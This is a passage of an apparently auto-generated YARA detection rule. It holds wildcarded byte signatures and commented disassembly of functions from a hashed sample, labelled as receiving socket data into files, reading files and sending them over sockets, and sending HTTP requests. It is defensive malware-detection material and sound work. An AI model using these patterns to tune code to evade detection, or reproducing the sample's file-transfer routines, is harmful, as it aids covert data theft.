$c47 = { 55 8B EC 83 EC 1C 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 02 68 00 00 00 40 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C3 } + /* +function at 0x004019e0@b94af4a4d4af6eac81fc135abda1c40c with 4 features: + - receive and write data from server to client + - receive data + - receive data on socket + - write file on Windows + .text:0x004019e0 + .text:0x004019e0 FUNC: int cdecl sub_004019e0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x004019e0 + .text:0x004019e0 Stack Variables: (offset from initial top of stack) + .text:0x004019e0 12: int arg2 + .text:0x004019e0 8: int arg1 + .text:0x004019e0 4: int arg0 + .text:0x004019e0 -8: int local8 + .text:0x004019e0 -12: int local12 + .text:0x004019e0 -524: int local524 + .text:0x004019e0 -528: int local528 + .text:0x004019e0 + .text:0x004019e0 55 push ebp + .text:0x004019e1 8bec mov ebp,esp + .text:0x004019e3 81ec0c020000 sub esp,524 + .text:0x004019e9 c745f800000000 mov dword [ebp - 8],0 + .text:0x004019f0 8b450c mov eax,dword [ebp + 12] + .text:0x004019f3 50 push eax + .text:0x004019f4 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004019f7 51 push ecx + .text:0x004019f8 8d55f8 lea edx,dword [ebp - 8] + .text:0x004019fb 52 push edx + .text:0x004019fc e83ffcffff call 0x00401640 ;sub_00401640(local12,arg0,arg1) + .text:0x00401a01 83c40c add esp,12 + .text:0x00401a04 85c0 test eax,eax + .text:0x00401a06 740a jz 0x00401a12 + .text:0x00401a08 b801000000 mov eax,1 + .text:0x00401a0d e9d4000000 jmp 0x00401ae6 + .text:0x00401a12 loc_00401a12: [1 XREFS] + 
.text:0x00401a12 6a00 push 0 + .text:0x00401a14 6880000000 push 128 + .text:0x00401a19 6a02 push 2 + .text:0x00401a1b 6a00 push 0 + .text:0x00401a1d 6a02 push 2 + .text:0x00401a1f 6800000040 push 0x40000000 + .text:0x00401a24 8b4510 mov eax,dword [ebp + 16] + .text:0x00401a27 50 push eax + .text:0x00401a28 ff1554b04000 call dword [0x0040b054] ;kernel32.CreateFileA(arg2,0x40000000,2,0,2,128,0) + .text:0x00401a2e 8985f4fdffff mov dword [ebp - 524],eax + .text:0x00401a34 83bdf4fdffffff cmp dword [ebp - 524],0xffffffff + .text:0x00401a3b 7516 jnz 0x00401a53 + .text:0x00401a3d 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401a40 51 push ecx + .text:0x00401a41 e8fafcffff call 0x00401740 ;sub_00401740(local12) + .text:0x00401a46 83c404 add esp,4 + .text:0x00401a49 b801000000 mov eax,1 + .text:0x00401a4e e993000000 jmp 0x00401ae6 + .text:0x00401a53 loc_00401a53: [2 XREFS] + .text:0x00401a53 6a00 push 0 + .text:0x00401a55 6800020000 push 512 + .text:0x00401a5a 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401a60 52 push edx + .text:0x00401a61 8b45f8 mov eax,dword [ebp - 8] + .text:0x00401a64 50 push eax + .text:0x00401a65 ff1560b14000 call dword [0x0040b160] ;ws2_32.recv(0,local524,512) + .text:0x00401a6b 8945fc mov dword [ebp - 4],eax + .text:0x00401a6e 6a00 push 0 + .text:0x00401a70 6a00 push 0 + .text:0x00401a72 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00401a75 51 push ecx + .text:0x00401a76 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401a7c 52 push edx + .text:0x00401a7d 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401a83 50 push eax + .text:0x00401a84 ff1544b04000 call dword [0x0040b044] ;kernel32.WriteFile(kernel32.CreateFileA(arg2,0x40000000,2,0,2,128,0),local524,ws2_32.recv(0,local524,512),0,0) + .text:0x00401a8a 85c0 test eax,eax + .text:0x00401a8c 7520 jnz 0x00401aae + .text:0x00401a8e 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401a91 51 push ecx + .text:0x00401a92 e8a9fcffff call 0x00401740 ;sub_00401740(local12) + .text:0x00401a97 83c404 add esp,4 
+ .text:0x00401a9a 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x00401aa0 52 push edx + .text:0x00401aa1 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x00401a28>) + .text:0x00401aa7 b801000000 mov eax,1 + .text:0x00401aac eb38 jmp 0x00401ae6 + .text:0x00401aae loc_00401aae: [1 XREFS] + .text:0x00401aae 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401ab2 7f9f jg 0x00401a53 + .text:0x00401ab4 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401aba 50 push eax + .text:0x00401abb ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x00401a28>) + .text:0x00401ac1 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401ac4 51 push ecx + .text:0x00401ac5 e876fcffff call 0x00401740 ;sub_00401740(local12) + .text:0x00401aca 83c404 add esp,4 + .text:0x00401acd 85c0 test eax,eax + .text:0x00401acf 7407 jz 0x00401ad8 + .text:0x00401ad1 b801000000 mov eax,1 + .text:0x00401ad6 eb0e jmp 0x00401ae6 + .text:0x00401ad8 loc_00401ad8: [1 XREFS] + .text:0x00401ad8 8b5510 mov edx,dword [ebp + 16] + .text:0x00401adb 52 push edx + .text:0x00401adc e8cffaffff call 0x004015b0 ;sub_004015b0(local12,arg2) + .text:0x00401ae1 83c404 add esp,4 + .text:0x00401ae4 33c0 xor eax,eax + .text:0x00401ae6 loc_00401ae6: [4 XREFS] + .text:0x00401ae6 8be5 mov esp,ebp + .text:0x00401ae8 5d pop ebp + .text:0x00401ae9 c3 ret + */ + $c48 = { 55 8B EC 81 EC 0C 02 00 00 C7 45 ?? 00 00 00 00 8B 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 02 6A 00 6A 02 68 00 00 00 40 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 00 02 00 00 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 6A 00 6A 00 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 83 7D ?? 00 7F ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? 
?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 33 C0 8B E5 5D C3 } + /* +function at 0x00401af0@b94af4a4d4af6eac81fc135abda1c40c with 5 features: + - receive data + - receive data on socket + - send HTTP request + - send data + - send data on socket + .text:0x00401af0 + .text:0x00401af0 FUNC: int cdecl sub_00401af0( int arg0, int arg1, int arg2, int arg3, int arg4, ) [2 XREFS] + .text:0x00401af0 + .text:0x00401af0 Stack Variables: (offset from initial top of stack) + .text:0x00401af0 20: int arg4 + .text:0x00401af0 16: int arg3 + .text:0x00401af0 12: int arg2 + .text:0x00401af0 8: int arg1 + .text:0x00401af0 4: int arg0 + .text:0x00401af0 -8: int local8 + .text:0x00401af0 -1032: int local1032 + .text:0x00401af0 -1036: int local1036 + .text:0x00401af0 -1040: int local1040 + .text:0x00401af0 -1552: int local1552 + .text:0x00401af0 -1556: int local1556 + .text:0x00401af0 + .text:0x00401af0 55 push ebp + .text:0x00401af1 8bec mov ebp,esp + .text:0x00401af3 81ec10060000 sub esp,1552 + .text:0x00401af9 53 push ebx + .text:0x00401afa 56 push esi + .text:0x00401afb 57 push edi + .text:0x00401afc c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x00401b06 c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x00401b10 8b450c mov eax,dword [ebp + 12] + .text:0x00401b13 50 push eax + .text:0x00401b14 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401b17 51 push ecx + .text:0x00401b18 8d95f4fbffff lea edx,dword [ebp - 1036] + .text:0x00401b1e 52 push edx + .text:0x00401b1f e81cfbffff call 0x00401640 ;sub_00401640(local1040,arg0,arg1) + .text:0x00401b24 83c40c add esp,12 + .text:0x00401b27 85c0 test eax,eax + .text:0x00401b29 740a jz 0x00401b35 + .text:0x00401b2b b801000000 mov eax,1 + .text:0x00401b30 e9c7010000 jmp 0x00401cfc + .text:0x00401b35 loc_00401b35: [1 XREFS] + .text:0x00401b35 bf80c04000 mov edi,0x0040c080 + .text:0x00401b3a 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x00401b40 83c9ff or 
ecx,0xffffffff + .text:0x00401b43 33c0 xor eax,eax + .text:0x00401b45 f2ae repnz: scasb + .text:0x00401b47 f7d1 not ecx + .text:0x00401b49 2bf9 sub edi,ecx + .text:0x00401b4b 8bf7 mov esi,edi + .text:0x00401b4d 8bc1 mov eax,ecx + .text:0x00401b4f 8bfa mov edi,edx + .text:0x00401b51 c1e902 shr ecx,2 + .text:0x00401b54 f3a5 rep: movsd + .text:0x00401b56 8bc8 mov ecx,eax + .text:0x00401b58 83e103 and ecx,3 + .text:0x00401b5b f3a4 rep: movsb + .text:0x00401b5d 8b7d10 mov edi,dword [ebp + 16] + .text:0x00401b60 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x00401b66 83c9ff or ecx,0xffffffff + .text:0x00401b69 33c0 xor eax,eax + .text:0x00401b6b f2ae repnz: scasb + .text:0x00401b6d f7d1 not ecx + .text:0x00401b6f 2bf9 sub edi,ecx + .text:0x00401b71 8bf7 mov esi,edi + .text:0x00401b73 8bd9 mov ebx,ecx + .text:0x00401b75 8bfa mov edi,edx + .text:0x00401b77 83c9ff or ecx,0xffffffff + .text:0x00401b7a 33c0 xor eax,eax + .text:0x00401b7c f2ae repnz: scasb + .text:0x00401b7e 83c7ff add edi,0xffffffff + .text:0x00401b81 8bcb mov ecx,ebx + .text:0x00401b83 c1e902 shr ecx,2 + .text:0x00401b86 f3a5 rep: movsd + .text:0x00401b88 8bcb mov ecx,ebx + .text:0x00401b8a 83e103 and ecx,3 + .text:0x00401b8d f3a4 rep: movsb + .text:0x00401b8f bf70c04000 mov edi,0x0040c070 + .text:0x00401b94 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x00401b9a 83c9ff or ecx,0xffffffff + .text:0x00401b9d 33c0 xor eax,eax + .text:0x00401b9f f2ae repnz: scasb + .text:0x00401ba1 f7d1 not ecx + .text:0x00401ba3 2bf9 sub edi,ecx + .text:0x00401ba5 8bf7 mov esi,edi + .text:0x00401ba7 8bd9 mov ebx,ecx + .text:0x00401ba9 8bfa mov edi,edx + .text:0x00401bab 83c9ff or ecx,0xffffffff + .text:0x00401bae 33c0 xor eax,eax + .text:0x00401bb0 f2ae repnz: scasb + .text:0x00401bb2 83c7ff add edi,0xffffffff + .text:0x00401bb5 8bcb mov ecx,ebx + .text:0x00401bb7 c1e902 shr ecx,2 + .text:0x00401bba f3a5 rep: movsd + .text:0x00401bbc 8bcb mov ecx,ebx + .text:0x00401bbe 83e103 and ecx,3 + .text:0x00401bc1 f3a4 rep: movsb + 
.text:0x00401bc3 6a00 push 0 + .text:0x00401bc5 8dbdfcfbffff lea edi,dword [ebp - 1028] + .text:0x00401bcb 83c9ff or ecx,0xffffffff + .text:0x00401bce 33c0 xor eax,eax + .text:0x00401bd0 f2ae repnz: scasb + .text:0x00401bd2 f7d1 not ecx + .text:0x00401bd4 83c1ff add ecx,0xffffffff + .text:0x00401bd7 51 push ecx + .text:0x00401bd8 8d85fcfbffff lea eax,dword [ebp - 1028] + .text:0x00401bde 50 push eax + .text:0x00401bdf 8b8df4fbffff mov ecx,dword [ebp - 1036] + .text:0x00401be5 51 push ecx + .text:0x00401be6 ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local1032,0xffffffff,0) + .text:0x00401bec 8985f0f9ffff mov dword [ebp - 1552],eax + .text:0x00401bf2 83bdf0f9ffffff cmp dword [ebp - 1552],0xffffffff + .text:0x00401bf9 751d jnz 0x00401c18 + .text:0x00401bfb 8b95f4fbffff mov edx,dword [ebp - 1036] + .text:0x00401c01 52 push edx + .text:0x00401c02 ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0) + .text:0x00401c08 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401c0e b801000000 mov eax,1 + .text:0x00401c13 e9e4000000 jmp 0x00401cfc + .text:0x00401c18 loc_00401c18: [2 XREFS] + .text:0x00401c18 6a00 push 0 + .text:0x00401c1a 6800020000 push 512 + .text:0x00401c1f 8d85f4f9ffff lea eax,dword [ebp - 1548] + .text:0x00401c25 50 push eax + .text:0x00401c26 8b8df4fbffff mov ecx,dword [ebp - 1036] + .text:0x00401c2c 51 push ecx + .text:0x00401c2d ff1560b14000 call dword [0x0040b160] ;ws2_32.recv(0,local1552,512) + .text:0x00401c33 8945fc mov dword [ebp - 4],eax + .text:0x00401c36 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401c3a 7e71 jle 0x00401cad + .text:0x00401c3c 8b95f8fbffff mov edx,dword [ebp - 1032] + .text:0x00401c42 0355fc add edx,dword [ebp - 4] + .text:0x00401c45 8b4518 mov eax,dword [ebp + 24] + .text:0x00401c48 3b10 cmp edx,dword [eax] + .text:0x00401c4a 7619 jbe 0x00401c65 + .text:0x00401c4c 8d8df4fbffff lea ecx,dword [ebp - 1036] + .text:0x00401c52 51 push ecx + .text:0x00401c53 e8e8faffff call 0x00401740 
;sub_00401740(local1040) + .text:0x00401c58 83c404 add esp,4 + .text:0x00401c5b b801000000 mov eax,1 + .text:0x00401c60 e997000000 jmp 0x00401cfc + .text:0x00401c65 loc_00401c65: [1 XREFS] + .text:0x00401c65 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00401c68 8db5f4f9ffff lea esi,dword [ebp - 1548] + .text:0x00401c6e 8b7d14 mov edi,dword [ebp + 20] + .text:0x00401c71 03bdf8fbffff add edi,dword [ebp - 1032] + .text:0x00401c77 8bd1 mov edx,ecx + .text:0x00401c79 c1e902 shr ecx,2 + .text:0x00401c7c f3a5 rep: movsd + .text:0x00401c7e 8bca mov ecx,edx + .text:0x00401c80 83e103 and ecx,3 + .text:0x00401c83 f3a4 rep: movsb + .text:0x00401c85 8b85f8fbffff mov eax,dword [ebp - 1032] + .text:0x00401c8b 0345fc add eax,dword [ebp - 4] + .text:0x00401c8e 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x00401c94 6868c04000 push 0x0040c068 + .text:0x00401c99 8b4d14 mov ecx,dword [ebp + 20] + .text:0x00401c9c 51 push ecx + .text:0x00401c9d e8be130000 call 0x00403060 ;_strstr(arg3,0x0040c068) + .text:0x00401ca2 83c408 add esp,8 + .text:0x00401ca5 85c0 test eax,eax + .text:0x00401ca7 7402 jz 0x00401cab + .text:0x00401ca9 eb2a jmp 0x00401cd5 + .text:0x00401cab loc_00401cab: [1 XREFS] + .text:0x00401cab eb1e jmp 0x00401ccb + .text:0x00401cad loc_00401cad: [1 XREFS] + .text:0x00401cad 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401cb1 7502 jnz 0x00401cb5 + .text:0x00401cb3 eb16 jmp 0x00401ccb + .text:0x00401cb5 loc_00401cb5: [1 XREFS] + .text:0x00401cb5 8d95f4fbffff lea edx,dword [ebp - 1036] + .text:0x00401cbb 52 push edx + .text:0x00401cbc e87ffaffff call 0x00401740 ;sub_00401740(local1040) + .text:0x00401cc1 83c404 add esp,4 + .text:0x00401cc4 b801000000 mov eax,1 + .text:0x00401cc9 eb31 jmp 0x00401cfc + .text:0x00401ccb loc_00401ccb: [2 XREFS] + .text:0x00401ccb 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401ccf 0f8f43ffffff jg 0x00401c18 + .text:0x00401cd5 loc_00401cd5: [1 XREFS] + .text:0x00401cd5 8d85f4fbffff lea eax,dword [ebp - 1036] + .text:0x00401cdb 50 push eax + 
.text:0x00401cdc e85ffaffff call 0x00401740 ;sub_00401740(local1040) + .text:0x00401ce1 83c404 add esp,4 + .text:0x00401ce4 85c0 test eax,eax + .text:0x00401ce6 7407 jz 0x00401cef + .text:0x00401ce8 b801000000 mov eax,1 + .text:0x00401ced eb0d jmp 0x00401cfc + .text:0x00401cef loc_00401cef: [1 XREFS] + .text:0x00401cef 8b4d18 mov ecx,dword [ebp + 24] + .text:0x00401cf2 8b95f8fbffff mov edx,dword [ebp - 1032] + .text:0x00401cf8 8911 mov dword [ecx],edx + .text:0x00401cfa 33c0 xor eax,eax + .text:0x00401cfc loc_00401cfc: [5 XREFS] + .text:0x00401cfc 5f pop edi + .text:0x00401cfd 5e pop esi + .text:0x00401cfe 5b pop ebx + .text:0x00401cff 8be5 mov esp,ebp + .text:0x00401d01 5d pop ebp + .text:0x00401d02 c3 ret + */ + $c49 = { 55 8B EC 81 EC 10 06 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 8B 45 ?? 50 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 80 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 70 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 8D BD ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 00 02 00 00 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 7E ?? 8B 95 ?? ?? ?? ?? 03 55 ?? 8B 45 ?? 3B 10 76 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 4D ?? 8D B5 ?? ?? ?? ?? 8B 7D ?? 03 BD ?? ?? ?? ?? 8B D1 C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 8B 85 ?? ?? ?? ?? 03 45 ?? 89 85 ?? ?? ?? ?? 
68 68 C0 40 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? EB ?? EB ?? 83 7D ?? 00 75 ?? EB ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 83 7D ?? 00 0F 8F ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 8B 4D ?? 8B 95 ?? ?? ?? ?? 89 11 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401790@b94af4a4d4af6eac81fc135abda1c40c with 2 features: + - send data + - send data on socket + .text:0x00401790 + .text:0x00401790 FUNC: int cdecl sub_00401790( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401790 + .text:0x00401790 Stack Variables: (offset from initial top of stack) + .text:0x00401790 12: int arg2 + .text:0x00401790 8: int arg1 + .text:0x00401790 4: int arg0 + .text:0x00401790 -8: int local8 + .text:0x00401790 -12: int local12 + .text:0x00401790 -524: int local524 + .text:0x00401790 -528: int local528 + .text:0x00401790 -532: int local532 + .text:0x00401790 + .text:0x00401790 55 push ebp + .text:0x00401791 8bec mov ebp,esp + .text:0x00401793 81ec10020000 sub esp,528 + .text:0x00401799 c745fc00000000 mov dword [ebp - 4],0 + .text:0x004017a0 8b450c mov eax,dword [ebp + 12] + .text:0x004017a3 50 push eax + .text:0x004017a4 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004017a7 51 push ecx + .text:0x004017a8 8d55fc lea edx,dword [ebp - 4] + .text:0x004017ab 52 push edx + .text:0x004017ac e88ffeffff call 0x00401640 ;sub_00401640(local8,arg0,arg1) + .text:0x004017b1 83c40c add esp,12 + .text:0x004017b4 85c0 test eax,eax + .text:0x004017b6 740a jz 0x004017c2 + .text:0x004017b8 b801000000 mov eax,1 + .text:0x004017bd e9a0000000 jmp 0x00401862 + .text:0x004017c2 loc_004017c2: [2 XREFS] + .text:0x004017c2 c785f4fdffff0000 mov dword [ebp - 524],0 + .text:0x004017cc 8b4510 mov eax,dword [ebp + 16] + .text:0x004017cf 50 push eax + .text:0x004017d0 6800020000 push 512 + .text:0x004017d5 6a01 push 1 + .text:0x004017d7 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x004017dd 51 push ecx + .text:0x004017de 
e892170000 call 0x00402f75 ;?(local524,1,512,arg2) + .text:0x004017e3 83c410 add esp,16 + .text:0x004017e6 8945f8 mov dword [ebp - 8],eax + .text:0x004017e9 loc_004017e9: [1 XREFS] + .text:0x004017e9 6a00 push 0 + .text:0x004017eb 8b55f8 mov edx,dword [ebp - 8] + .text:0x004017ee 52 push edx + .text:0x004017ef 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x004017f5 50 push eax + .text:0x004017f6 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004017f9 51 push ecx + .text:0x004017fa ff154cb14000 call dword [0x0040b14c] ;ws2_32.send(0,local524,sub_00402f75(local524,1,512,arg2),0) + .text:0x00401800 8985f0fdffff mov dword [ebp - 528],eax + .text:0x00401806 83bdf0fdffffff cmp dword [ebp - 528],0xffffffff + .text:0x0040180d 7513 jnz 0x00401822 + .text:0x0040180f 8d55fc lea edx,dword [ebp - 4] + .text:0x00401812 52 push edx + .text:0x00401813 e828ffffff call 0x00401740 ;sub_00401740(local8) + .text:0x00401818 83c404 add esp,4 + .text:0x0040181b b801000000 mov eax,1 + .text:0x00401820 eb40 jmp 0x00401862 + .text:0x00401822 loc_00401822: [1 XREFS] + .text:0x00401822 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401828 0385f0fdffff add eax,dword [ebp - 528] + .text:0x0040182e 8985f4fdffff mov dword [ebp - 524],eax + .text:0x00401834 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x0040183a 3b4df8 cmp ecx,dword [ebp - 8] + .text:0x0040183d 72aa jc 0x004017e9 + .text:0x0040183f 837df800 cmp dword [ebp - 8],0 + .text:0x00401843 0f8779ffffff ja 0x004017c2 + .text:0x00401849 8d55fc lea edx,dword [ebp - 4] + .text:0x0040184c 52 push edx + .text:0x0040184d e8eefeffff call 0x00401740 ;sub_00401740(local8) + .text:0x00401852 83c404 add esp,4 + .text:0x00401855 85c0 test eax,eax + .text:0x00401857 7407 jz 0x00401860 + .text:0x00401859 b801000000 mov eax,1 + .text:0x0040185e eb02 jmp 0x00401862 + .text:0x00401860 loc_00401860: [1 XREFS] + .text:0x00401860 33c0 xor eax,eax + .text:0x00401862 loc_00401862: [3 XREFS] + .text:0x00401862 8be5 mov esp,ebp + .text:0x00401864 5d pop ebp + 
.text:0x00401865 c3 ret + */ + $c50 = { 55 8B EC 81 EC 10 02 00 00 C7 45 ?? 00 00 00 00 8B 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 8B 45 ?? 50 68 00 02 00 00 6A 01 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 10 89 45 ?? 6A 00 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 72 ?? 83 7D ?? 00 0F 87 ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 8B E5 5D C3 } + /* +function at 0x00401870@b94af4a4d4af6eac81fc135abda1c40c with 4 features: + - read and send data from client to server + - read file on Windows + - send data + - send data on socket + .text:0x00401870 + .text:0x00401870 FUNC: int cdecl sub_00401870( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401870 + .text:0x00401870 Stack Variables: (offset from initial top of stack) + .text:0x00401870 12: int arg2 + .text:0x00401870 8: int arg1 + .text:0x00401870 4: int arg0 + .text:0x00401870 -8: int local8 + .text:0x00401870 -12: int local12 + .text:0x00401870 -524: int local524 + .text:0x00401870 -528: int local528 + .text:0x00401870 -532: int local532 + .text:0x00401870 -536: int local536 + .text:0x00401870 + .text:0x00401870 55 push ebp + .text:0x00401871 8bec mov ebp,esp + .text:0x00401873 81ec14020000 sub esp,532 + .text:0x00401879 c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401880 8b450c mov eax,dword [ebp + 12] + .text:0x00401883 50 push eax + .text:0x00401884 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401887 51 push ecx + .text:0x00401888 8d55fc lea edx,dword [ebp - 4] + .text:0x0040188b 52 push edx + .text:0x0040188c e8affdffff call 0x00401640 ;sub_00401640(local8,arg0,arg1) + .text:0x00401891 83c40c add esp,12 + .text:0x00401894 85c0 test eax,eax + .text:0x00401896 740a jz 
0x004018a2 + .text:0x00401898 b801000000 mov eax,1 + .text:0x0040189d e936010000 jmp 0x004019d8 + .text:0x004018a2 loc_004018a2: [1 XREFS] + .text:0x004018a2 6a00 push 0 + .text:0x004018a4 6880000000 push 128 + .text:0x004018a9 6a03 push 3 + .text:0x004018ab 6a00 push 0 + .text:0x004018ad 6a01 push 1 + .text:0x004018af 6800000080 push 0x80000000 + .text:0x004018b4 8b4510 mov eax,dword [ebp + 16] + .text:0x004018b7 50 push eax + .text:0x004018b8 ff1554b04000 call dword [0x0040b054] ;kernel32.CreateFileA(arg2,0x80000000,1,0,3,128,0) + .text:0x004018be 8985f4fdffff mov dword [ebp - 524],eax + .text:0x004018c4 83bdf4fdffffff cmp dword [ebp - 524],0xffffffff + .text:0x004018cb 7516 jnz 0x004018e3 + .text:0x004018cd 8d4dfc lea ecx,dword [ebp - 4] + .text:0x004018d0 51 push ecx + .text:0x004018d1 e86afeffff call 0x00401740 ;sub_00401740(local8) + .text:0x004018d6 83c404 add esp,4 + .text:0x004018d9 b801000000 mov eax,1 + .text:0x004018de e9f5000000 jmp 0x004019d8 + .text:0x004018e3 loc_004018e3: [2 XREFS] + .text:0x004018e3 c785f0fdffff0000 mov dword [ebp - 528],0 + .text:0x004018ed 6a00 push 0 + .text:0x004018ef 8d55f8 lea edx,dword [ebp - 8] + .text:0x004018f2 52 push edx + .text:0x004018f3 6800020000 push 512 + .text:0x004018f8 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x004018fe 50 push eax + .text:0x004018ff 8b8df4fdffff mov ecx,dword [ebp - 524] + .text:0x00401905 51 push ecx + .text:0x00401906 ff1548b04000 call dword [0x0040b048] ;kernel32.ReadFile(kernel32.CreateFileA(arg2,0x80000000,1,0,3,128,0),local524,512,local12,0) + .text:0x0040190c 85c0 test eax,eax + .text:0x0040190e 7535 jnz 0x00401945 + .text:0x00401910 ff154cb04000 call dword [0x0040b04c] ;ntdll.RtlGetLastWin32Error() + .text:0x00401916 83f826 cmp eax,38 